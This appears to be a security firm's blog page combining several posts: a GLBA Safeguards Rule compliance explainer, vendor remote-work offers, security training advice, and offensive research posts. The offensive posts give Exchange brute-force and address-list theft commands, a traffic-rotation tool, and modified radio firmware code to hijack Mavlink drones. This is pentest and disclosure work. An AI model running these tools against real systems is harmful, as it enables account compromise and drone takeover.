The GLBA Safeguard Rule has changed, and it isn't just banks that need to understand it.

Back in 1999, the Gramm-Leach-Bliley Act was passed in the United States. Its main purpose was to allow banks to offer services that previously were forbidden by laws passed even farther back in 1933. In doing so, the scope of these new rules surrounding these services not only applied to banks, but also to any organization that offered them.

A primary component of this Act, Section 501, requires the protection of non-public personal information. It states, "...each financial institution has an affirmative and continuing obligation to respect the privacy of its customers and to protect the security and confidentiality of those customers' nonpublic personal information."

Privacy, Security, Confidentiality. Could you identify a hot topic in information security today that doesn't involve one or all three of those areas? Couple that intense interest with the changes in technology that have occurred over the past 20 years, and the current pace that they continue to change, and you can understand why amendments to the GLBA were needed.

The main rule we will discuss here is the Standards for Safeguarding Customer Information, commonly called the Safeguards Rule. Originally published in 2001, this rule was just amended (January 10, 2022) and some of the most important provisions will become effective on December 9, 2022. The overlying goal of this rule is the requirement to have, "the administrative, technical, or physical safeguards you use to access, collect, distribute, process, protect, store, use, transmit, dispose of, or otherwise handle customer information."

Does this apply to me?

You can't duck the issue based on size. Nearly all rules apply, regardless of size, except for some new elements which apply to entities that maintain fewer than 5,000 consumer records. The most important qualifier is:

  1. You are considered to be a "financial institution" under the GLBA's definitions, or
  2. You receive information about customers of financial institutions.

If either of these are true, then the GLBA rules apply to you.

What is a financial institution according to the GLBA? The exact definition is, "any institution the business of which is engaging in an activity that is financial in nature or incidental to such financial activities as described in section 4(k) of the Bank Holding Company Act of 1956, 12 U.S.C. 1843(k)."In case you don't have the Bank Holding Company Act handy, here is a list of examples of financial institutions that the GLBA applies to, as noted in 16 CFR 314.2(h)(2)(iv):

These are just some examples, and this list is not all inclusive. Note that simply letting someone run a tab or accepting payments in the form of a credit card that was not issued by the seller does not make an entity a financial institution.

Ok, it applies to me. Now what?

At the heart of the Safeguards Rule are a number of key elements involving the development, maintenance, and enforcement of a written information security plan (ISP). The keys aspects and notable amendments:

  1. A single qualified individual must be designated to oversee, implement, and enforce the ISP. This is a change from the original language, which allowed for one or more employees to coordinate the program.If your organization doesn't have a qualified individual on staff, a third-party company can be utilized for this function. This does, however, require the designation of a senior member of the organization to direct and oversee the third-party representative(s) and all compliance obligations remain with the hiring organization.
  2. A risk assessment process must be in place. This process must identify and assess risks to customer information in each relevant company area and evaluate the effectiveness of current controls implemented to mitigate those risks. This is not a new requirement, however, for companies maintaining information on 5,000 or more customers, the following elements must be part of the risk assessment documentation:
    1. The criteria used to evaluate and categorize risks and threats to information systems
    2. The criteria used to assess the confidentiality, integrity, and availability of information and systems used to process customer information and adequacy of the existing controls
    3. A description of how identified risks will be mitigated or accepted, and how the ISP will address those risks
  3. Design and implement a safeguards program, and regularly monitor and test it. This is not a new requirement, however, the amendments added eight specific types of safeguards that must be part of this program:
    1. Physical and technical access controls, including a review of authorized users
    2. Identification and evaluation of the data, personnel, devices, and systems used that interact with customer data
    3. Encryption of all customer information, both in transit and at rest
    4. Secure development practices and security testing for applications used for transmitting, accessing, or storing customer information
    5. Implementation of multi-factor authentication for any information system that contains customer information accessed by any individual. This requirement can also be met if the qualified individual noted in item 1 has approved an equivalent or stronger control.
    6. Procedures for the secure disposal of customer information no later than two years after the last date the information is used unless retention is otherwise required or necessary for legitimate business purposes
    7. Implementation of change management policies
    8. Implementation of policies, procedures, and controls to monitor and log authorized user activity and detect unauthorized use
  4. Routine testing and monitoring of controls enforcing the safeguards program must be conducted to evaluate their effectiveness. This is not a new addition; however, two specific control tests are now required for companies maintaining information on 5,000 or more customers:
    1. Conduct vulnerability scanning at least every six months
    2. Undergo penetration testing at least annually
  5. Specific policy requirements for training of information systems personnel and general security awareness training. The amendments add specificity to the existing training requirements that were already in place and require formal documentation of the policies. These specific elements include:
    1. Security updates and training procedures to address new risks specific to systems that are running in the enterprise's environment
    2. Verification that key personnel are maintaining their knowledge of threats and available defenses against those threats
    3. General security awareness training requirements and procedures for all employees and engaged third parties utilizing the enterprise's information systems
  6. The requirement to oversee service providers that assist in the preparation, maintenance, and use of the environment handling consumer data was part of the original rule. This requires the selection of service providers capable of maintaining appropriate safeguards, and that contract language mandates these safeguards. The amendments add an additional requirement that the service providers must be periodically assessed on the risks associate with their use, and the adequacy of the safeguards they have implemented.
  7. A new requirement for entities handling more than 5,000 consumer records is for the existence of a written incident response plan. There are seven requirements for this plan in the new amendments:
    1. Stated goals of the response plan
    2. A description of internal procedures for responding to a security event
    3. The definition of roles, responsibilities, and levels of decision-making authority for individuals involved in the incident response process
    4. Plans for handling internal and external communications, and details on the use of information sharing resources
    5. Procedures for the remediation of identified weaknesses in information systems and associated controls
    6. Requirements for documenting and reporting of security events, procedures classifying incidents, and the activation of the incident response plan
    7. A defined process for post-incident performance, evaluation, and revision of the incident response plan following an event.
  8. Another new requirement for entities handling more than 5,000 consumer records is for a written report, presented to the enterprise's governing body or senior/executive level individual, done on at least an annual basis. This report is to be created by the qualified individual responsible for oversight of the ISP as noted in item number one. There are two elements required to be in the report:
    1. The overall status of the ISP, including its compliance with the updated Safeguards Rule
    2. Recommendations for changes or improvements, and any other material matters related to the ISP

That's a lot of stuff! How long do I have to comply?

Covered financial institutions should be in compliance with the non-amended components of the Safeguards Rule already, since the formal effective date of the rule was January 10, 2022. The FTC has allowed for an effective date of December 9, 2022, for the amended provisions due to the length of time required to implement them.

Are there penalties for non-compliance?

Besides the potential costs associated with breaches, successful malware attacks, ransomware, and the like, there are penalties that can be assessed by the FTC for non-compliance. These penalties can apply to the enterprise and/or individuals responsible for compliance as follows:

So, if this does apply to you and your organization, hopefully you are already compliant and none of this was a surprise to you. If this doesn't apply to you, I commend you for reading on. And if it applies and you are completely surprised by the requirements and amendments, the clock is ticking!

*Offers updated on March 26, 2020

Most enterprises are getting slammed with employees working from home. Most of us designed our remote user VPN’s for the occasional "snow day" ...right. Now we have an entire workforce, working from home full time for weeks…maybe months …oh yeah, and using a full suite of applications including voice… crazy. No really!

Many of you have contacted SynerComm to get additional VPN licenses/concentrators, endpoint security controls, and help designing and spinning up "new ways" to get employees connected securely. During these crazy times some of our vendors are stepping up and trying to make a difference.

To help you we would like to share a few solutions/offers from our vendors:

VendorOfferDetails
Palo Alto NetworksFree 90-day GlobalProtect VPN subscription license for mobile devices like iPads, etc. (Other GP is already free)Customer logins into their own support portal and select trial licenses
Pulse SecureFlexible Pulse Connect Secure licensingValid through May 31st
CrowdStrikeSurge relief for 60 days (existing customers)
CrowdStrike Falcon Prevent home use licenses
Expiration TBD
SentinelOneFree trials:

SentinelOne Core: AI-powered prevention, detection, and automated response in a single, autonomous lightweight agent; legacy antivirus replacement across Windows, Mac, and Linux operating systems with no connectivity or network dependency.

Deployment services: remote deployment assistance to ensure rapid installation and customized configuration
Offer expires May 16th
ArmorbloxNo charge offer to help businesses with 100+ employees during these challenging times.Expiration TBD
Extreme NetworksWork from Home bundle discount Extreme Networks and Tech Data have created a Portable Branch Office Kit to enable your customers to connect, secure, and manage remote sites and remote workers quickly and easily. Combining SD-WAN, Wi-Fi, and cloud management into an easy to deploy, plug and play solution, this kit offer delivers the ability to provide an enterprise-class experience for all connected users, regardless of where they reside.Discounted
LastlineLastline Analyst at no cost for 90 days to organizations with 500+ employees.Offer expires June 30, 2020
ProofpointFree trial - Scalable secure access for increasing your mobile workforce.Offer expires September 30, 2020
UBIQFree trial to Trusted File ManagerOffer expires June 20, 2020

[vc_empty_space height="20px"][ult_buttons btn_title="Contact Us" btn_link="url:/contact/|title:Contact%20Us||" btn_align="ubtn-center" btn_size="ubtn-large" btn_title_color="#ffffff" btn_bg_color="#0569b3" icon_size="32" btn_icon_pos="ubtn-sep-icon-at-left"][vc_column_text el_class="large-blue"]

Have questions or want some guidance with taking advantage of these vendor offers?

Outlook Web Access (OWA) has been one of the consistently viable attack vectors for pentesters and bad guys alike for many years. Frequently, an attacker will obtain valid credentials by brute forcing OWA portals exposed to the internet. Once credentials are obtained an attacker can then access the target network via any other single factor authentication portals that may also be exposed (Citrix, VPN, or *gulp* RDP).

After using multiple brute force tools I began to see some false negatives, so I decided to dive into writing my own tool. I found that many installations of Exchange provide an API through the Exchange Web Service (EWS) and wrote a set of modules to take advantage of that.

The EWS is a convenient API exposed to allow programatic access to someones mailbox and some Exchange functionality (Thanks Microsoft!). To get started using these modules you have to install the Exchange Web Service API (here). Once that is installed get a copy of the OWA-Toolkit from here. Then import the module like so:

Import-module C:\path\to\OWA-Toolkit.psm1

Once you have the module imported you should be able to see what cmdlets it includes:

 


 

 

Decide if you want to brute using user ids or full email addresses and then compile a list of targets. The list should just be a txt file that has one user per line. Then you can invoke Brute-EWS like so (if you want to brute with emails include the Domain parameter):

Brute-EWS -TargetList .\userids.txt -ExchangeVersion 2007_SP1 -ewsPath "https://webmail.yourdomain.com/EWS/Exchange.asmx" -Password "omg123" -Domain "yourdomain.com"

If you so chose you can also pass the UserAsPass parameter to attempt authentication with the userid passed as the password. Once valid credentials are obtained it is common to take the Global Address List (GAL) to use for additional brute forcing or social engineering. This was usually a painful process forcing OWA to load all the addresses while I was proxying it through Burp. So, utilizing the EWS I decided to write a script to take the GAL. To use the Steal-GAL cmdlet you can invoke it like so:

Steal-GAL -Password "littlejohnny" -User "dbetty" -domain "yourdomain.com" -ExchangeVersion 2007_SP1

You can also pipe an exchService object to this cmdlet like so:

OTK-Init -Password "littlejohnny" -User "dbetty" -Domain "yourdomain.com" -ExchangeVersion 2007_SP1 | Steal-GAL

The output is designed to be piped to an output method of your choice; the easiest way I have found is to just add "| export-csv -Path .\gal.csv" to your command. Please provide any feedback or issues you might have to Github. Thanks.

 

 

First, let's talk about what "failure" is and is not in the context of Security Awareness Training (SAT). Failure is not when a company gets breached due to social engineering. Wait, what?? All the outstanding training in the world does not guarantee that an individual will follow it when the moment of testing occurs. Soldiers are trained to highest levels to deal with the stress and trauma of battle, but still come back scarred, having likely made mistakes in spite of their training.

Security Awareness Training "failure" is when a user is left without the knowledge to act appropriately in a given situation.  In other words, when they haven't been properly prepared to handle phishing emails and voice based scams or choose a strong password, SAT has failed them. The user clicking on the phishing link is just the end result of this failure.

I submit that SAT failure occurs for (at least) three reasons:

1) Training does not reflect real life security encounters.

I am sick to death of training courses telling users that they should watch out for misspellings and grammar mistakes in the email body, as if phishers don't have access to Word's spell/grammar check. While its certainly true that phishing emails can and do originate from these places, the user is actually provided a false sense of security if that is their sole basis for detection. What if your company employs or works with individuals whose first language isn't English? End users will receive legitimate emails with spelling/grammar mistakes and their training will be for nothing.

Trainer tip: If you want to talk about misspellings, forget the body of the email and focus on the sender's domain! That's more of an effective phishing mitigation technique than looking for misspellings in a paragraph will ever be.

Additionally, how often have we heard to choose a "secure" password like "7Jkw8$hQ"? Look at that thing. Covers all the complexity rules, meets the minimum 8 character corporate standard, a true thing of beauty...

🙁

Trainers say this because they've never cracked a password hash in their whole career and don't know any better (See #2). With our cracking rig, that would take about 2 seconds to crack (NTLMv1 that is. About an hour for NTLMv2).

Trainer Tip: Emphasize length over complexity, every time. "this here password is fantastic" is much stronger than an 8 character complex password and is way easier to type!

Good SAT has to be thoroughly relevant and a bit scary. Users must understand the consequences of clicking that link or opening that attachment. It's not good enough to simply say "don't do this", they must come to understand why. If they cannot link their improper action with a loss of company data in vivid, graphic detail, you aren't doing your job.

2) Instructor does not have the right experience to be effective.

The best instruction I've ever received, security-wise or other, has been from those who have been there - actually doing the work. They aren't professional trainers. They are simply experts in their field because they've spent years actually doing the things they are training about. When you go on YouTube to learn how to replace a toilet, do you find 17 year old Billy's video and follow that, or do you find some crusty graybeard who's been plumbing his whole life? That's not to say good trainers can't be young, it just means they must be *experienced*.

Let me emphasize this: the WORST thing you can do for your org is to simply relegate your SAT to computer based training. Forcing a user to watch some lame video of a "hacker" so they can click Next as fast as possible before guessing the painfully obvious quiz answers is an egregious waste of company resources, not to mention people's lives.

Real hackers use The Force! 

Do you company's data a favor, pay for high quality live training that will make an impression and get your users talking about security! Fostering a culture of security in your enterprise is one of the best things you can do for your organization's security posture.

3) Training is boring.

This is a personal pet peeve of mine. How often have we watched someone with awesome content who simply could not deliver it well. I'm not talking about people who are nervous during their presentation. That's certainly understandable. I'm talking about people who deliver in a bland, monotone, and otherwise horrible way - devoid of anything close to resembling emotion.

At this point on the revenue curve, you will get exactly the same amount of revenue as this point....

Information Security is one of the most interesting fields in existence today, and one need not look far for stories that will not only make you laugh (or cry), but will also drive home the points you need to make as a trainer.

Trainer Tip: Learn how to tell a good story. Practice in the mirror if you have to, but do not settle for mediocrity. Your training should be engaging and memorable, and when it comes to Information Security, nothing beats a good story! Don't know how to do that? Start here. Then here.

Pro Trainer Tip: Tell stories about your failures. When people observe you as a human, not an "expert", you will connect with them immediately and have their complete attention.

Final Thoughts

If you want to deliver solid infosec training, you must focus on the right things, have the experience to back it up, and be able to connect to your audience. Miss any one of these three and the quality of your training will suffer. Put up screenshots of real phishing emails, do a quick demo of what a compromise looks like, tell your audience how you failed then succeeded, and people will connect with you not only as an expert, but also as one who is in the trenches with them. There is no better place to be as a trainer.

But I'm just organizing the training for my company!

Hire a pentester! They will (hopefully) know their stuff and have the experience to back it up. Have a quick call with them to make sure they don't bore you to tears, and off you go. Don't know who to hire? Call me biased, but I think these guys are pretty good. 🙂

@curi0usJack

This is an update to an older post that can be found here.  Since createProxy's initial release, we've received some great feedback and, as a result, we made some improvements.   There were several shortcomings with the previous version, all of which rested on the use of ProxyChains.  ProxyChains is old, outdated, and failed to support  protocols such as  UDP or ICMP or Java apps (i.e. Burp).  So it was re-written, code can be found: https://github.com/Shellntel/scripts/blob/master/proxyCannon.py

The original version used SSH's ability to create SOCKS proxies; however, as it turns out SSH also supports the ability to create both layer 2 and layer 3 tunnels.  These are different than SOCKS connection, in that a fully-fledged network tunnel is established between the two endpoints.  Find more details on how to set this up here.

The new proxyCannon script takes advantage of this feature by building VPN tunnels to each EC2 instance and round robining locally generated traffic between each one.  Since we're using the local systems routing table all session information will be retained (i.e. TCP streams are not split between systems).  Furthermore, now we can push any network based traffic across it: TCP, UDP, ICMP and more.

Below are some pictures of proxyCannon in use:


An example of the script starting up 3 ami-d05e75b8 (ubuntu) instances on t2.micro hardware in the us-east-1 region.

Next, in a new tab we verify that our connections are up


Here we can see that 3 SSH connections are successfully established to each public IP of the ec2 instances started


And here we can see that 3 new interfaces were created, one for each SSH tunnel established

With everything stood up, we run a simple test.  In one tab we run a simple ping with a count of 3.


We can see that each ICMP packet is sent through a different EC2 node.  Also note the time stamps on the packet each node is used randomly!

That it!  Browsers, pentesting tools, whatever, should all work seamlessly.  To close down the proxy, just go back to your first tab and hit enter.

Any questions, comment or bugs, please feel free to submit them to github.  Thanks!

Recently some of us here at shellntel have been building quadcopters and autonomous vehicles for fun.  We are big fans of the Pixhawk flight controller for its awesome autonomous capabilities.  We are also big fans of privacy.  As much as we like to build and fly these drones, we realize doing so in an irresponsible way can cause concern. We started looking into the various drone communications and discovered a design flaw that allowed us to take control of any drone flying with a specific telemetry protocol.

Telemetry allows the drone to exchange information and commands wirelessly with a ground station. This includes sending/receiving GPS coordinates, waypoints, throttle adjustments, arm and disarm commands, pretty much anything, including a serial shell.

The design flaw is not unique to PixHawk, but rather with the Mavlink protocol. Mavlink is used by many companies including:  Parrot AR.Drone (with Flight Recorder), ArduPilot, PX4FMU, pxIMU, SmartAP, MatrixPilot, Armazila 10dM3UOP88, Hexo+, TauLabs and AutoQuad. All of these companies make great products, but if they adopt the Mavlink protocol as is, it may be possible to hijack their drones (and any other drone using Mavlink).

According to its documentation, each Mavlink radio pair is setup with a NetID or channel.  This is done to prevent two radio pairs from interfering with each other.  By default this value is set to 25, but the user can change this setting. To hijack one of these drones, all you'd need to do is set your transmitter to the same NetID as the target drone.

Looking at the protocol spec, each data packet sent by the radio includes the NetID in its transmission!  This means that all we need to do is listen for a single packet within the frequency spectrum, capture it, carve the NetID, and set our radio to use it.  This, is surprisingly easy.

Using these radios (we used v2), we can modify the OSS firmware to simply do this.  The following changes were made to  radio.c which when compiled is flashed to the transmitter.

 

Original Code:

    // decode the header
    errcount = golay_decode(6, buf, gout);
    if (gout[0] != netid[0] || gout[1] != netid[1]) {
        // its not for our network ID 
        debug("netid %x %x\n",
               (unsigned)gout[0],
               (unsigned)gout[1]);
        goto failed;
    }

Modified Code:

        // decode the header
        errcount = golay_decode(6, buf, gout);
        if (gout[0] != netid[0] || gout[1] != netid[1]) {
                // its not for our network ID 
                /* Modified by __int128 */
                // Set our radio to use the captured packets NetID
                param_set(PARAM_NETID, gout[0]);
                // Save the value to flash
                param_save();
                 // To read the new value we need to reboot.  Rebooting
                RSTSRC |= (1 << 4);
                /* End of what was added by __int128*/
        }

The variable gout[0] is set earlier in the radio.c; which is populated with the NetID of all captured packets.  This block of code is only hit when our radio hears a packet from another radio set on a different NetID from ours (which is good because don’t want to reboot each time we hear a new packet).  Anyway, that’s it, 3 lines of code is all it takes to hijack any drone using Mavlink.  Compile it, flash the radio and you’re good to go.  It works surprisingly well and is super quick.  

linkedin facebook pinterest youtube rss twitter instagram facebook-blank rss-blank linkedin-blank pinterest youtube twitter instagram